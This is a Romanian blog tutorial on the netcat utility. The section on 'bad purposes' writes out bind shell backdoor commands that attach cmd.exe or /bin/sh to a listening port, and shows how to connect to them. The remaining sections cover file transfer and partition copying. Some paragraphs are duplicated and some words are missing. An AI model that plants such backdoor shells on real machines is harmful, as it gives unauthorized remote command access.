Programul, utilitarul n etcat este folo sit mai ales de 
, dar poate fi folosit si pentru scopuri bune. Originalul programului era un program in Unix, dar mai tarziu au aparut si versiunile pentru Linux si pentru Windows. Netcat este de obicei folosit ca si backdoor de catre pe calculatoare, servere sparte. Necat este capabil sa infiinteze o conexiune TCP sau UDP intre doua calculatoare, adica poate sa scrie si sa citeasca printr-un port deschis. Astfel cu ajutorul programului se pot transfera fisiere si se pot executa comenzi in anumite cazuri.Poate fi filosit pentru scanarea porturilor, desi nu pentru aceasta latura este renumit. Netcat este un program foarte vechi, dar e folosit si acum si de multe ori a fost nominalizat ca fiind unul dintre cele mai importante simple utilitare de securitate.
, dar poate fi folosit si pentru scopuri bune. Originalul programului era un program in Unix, dar mai tarziu au aparut si versiunile pentru Linux si pentru Windows. Netcat este de obicei folosit ca si backdoor de catre pe calculatoare, servere sparte. Necat este capabil sa infiinteze o conexiune TCP sau UDP intre doua calculatoare, adica poate sa scrie si sa citeasca printr-un port deschis. Astfel cu ajutorul programului se pot transfera fisiere si se pot executa comenzi in anumite cazuri.Poate fi filosit pentru scanarea porturilor, desi nu pentru aceasta latura este renumit. Netcat este un program foarte vechi, dar e folosit si acum si de multe ori a fost nominalizat ca fiind unul dintre cele mai importante simple utilitare de securitate.Netcat folosit pentru scopuri rele
In Windows
Ca sa ne conectam la un calculator cu sistemul de operare Windows, prima data trebuie sa pornim programul netcat ptrintr-un port deschis, adica care nu e protejat de un firewall.
Ca sa ne conectam la un calculator cu sistemul de operare Windows, prima data trebuie sa pornim programul netcat ptrintr-un port deschis, adica care nu e protejat de un firewall.
Comanda executata pe calculatorul la care vrem sa ne conectam!
C:\nc.exe -l -p 8080 -e c:\windows\system32\cmd.exe
Cand executati aceasta comanda nu va aparea nimic dupa ce apasati pe Enter, insa se va deschidea o conexiune la care se poate conecta.
-l = Listen, adica deschidem o conexiune
-p = Port, specificam pe care port se sa deschida conexiunea (in anumite versiuni a programului nu trebuie sa scrieti directiva -p, doar numarul portului
-e = Comanda care sa fie executata cand se conecteaza la portul definit
Comanda ca sa ne conectam
C:\nc.exe 192.168.1.101 8080Microsoft Windows XP [Version 5.xx](C) Copyright 1985-x Microsoft Corp.C:\
In Linux
In linux singura diferenta este faptul, ca acolo trebuie sa pornim un alt Shell, adica program care accepta comenzi
root# nc -l -p 8080 -e /bin/sh
In windows versiunile netcatului care suporta directiva -e, adica executa, sunt detectate de obicei de catre programele de antivirus, si la devirusare de obicei sunt sterse, insa transmiterea fisierelor cu versiunile care nu executa comenzi, este posibila si in aceste cazuri.
Netcat folosit pentru Scopuri bune
Netcat poate fi si este folosit si de administratorii de servere. Cand se sparge un server, i de obicei schimba, infecteaza fisierele binare de pe sistem, si astfel chiar si daca administratorul se apuca sa curete sistemul s-ar putea sa nu reuseasca pentru ca munca lui poate fi urmarit de 
. Ganditi-va de exemplu la schimbarea parolelor. In aceste cazuri daca avem scris pe un cd programul netcat, se poate conecta la server, fara ca conexiunea respectiva sa fie compromisa.
Un alt avantaj al programului mai este posibilitatea copierii a fisierelor prin retea, fara sa avem un server FTP, HTTP sau orice alt serviciu care permite transmitrea datelor. Cu netcat se poate copia fisiere mici si mari foarte usor, inclusiv partitii intregi.
i de obicei schimba, infecteaza fisierele binare de pe sistem, si astfel chiar si daca administratorul se apuca sa curete sistemul s-ar putea sa nu reuseasca pentru ca munca lui poate fi urmarit de . Ganditi-va de exemplu la schimbarea parolelor. In aceste cazuri daca avem scris pe un cd programul netcat, se poate conecta la server, fara ca conexiunea respectiva sa fie compromisa.Un alt avantaj al programului mai este posibilitatea copierii a fisierelor prin retea, fara sa avem un server FTP, HTTP sau orice alt serviciu care permite transmitrea datelor. Cu netcat se poate copia fisiere mici si mari foarte usor, inclusiv partitii intregi.
Exemple
Citirea unui fisier txt de la distanta
Haideti sa presupune ca avem un fisier txt, care se numeste, adrese-web.txt si contine textul “parola adresa web www.exemplu.com”
Comanda pentru servirea fisierului:
root# nc -l -p 8080 < adrese-web.txt
Comanda pentru citirea fisierului, si cum va arata, adica continutul fisierului adrese-web.txt
root# nc 192.168.1.101 8080parola adresa web www.exemplu.com
Copierea a unui fisier cu Netcat
Trimiterea fisierului
root# cat imagine.jpg | nc -l 5050
Primirea fisierului
root# nc 192.168.1.101 5050 > imagine.jpg
Copierea a unei partitii intregi cu netcat
Crearea imaginii si trimiterea fisierului
root# dd if=/dev/hdb2 | gzip -9 | nc -l 5050
Primire
root# nc 192.168.1.101 5050 | pv -b > partitiahdb2.img.gz
-pv = progress indicator, ca sa va arate cat s-a copiat
In ultima vreme programul netcat pentru Windows se poate gasi pe net din ce in ce mai greu, ca sa va economisesc din timpul vostru, aici este un link de unde putet-i sa-l downloadati: download netcat windows, versiunile pentru Linux veti gasi usor.
Niciun comentariu:
Trimiteți un comentariu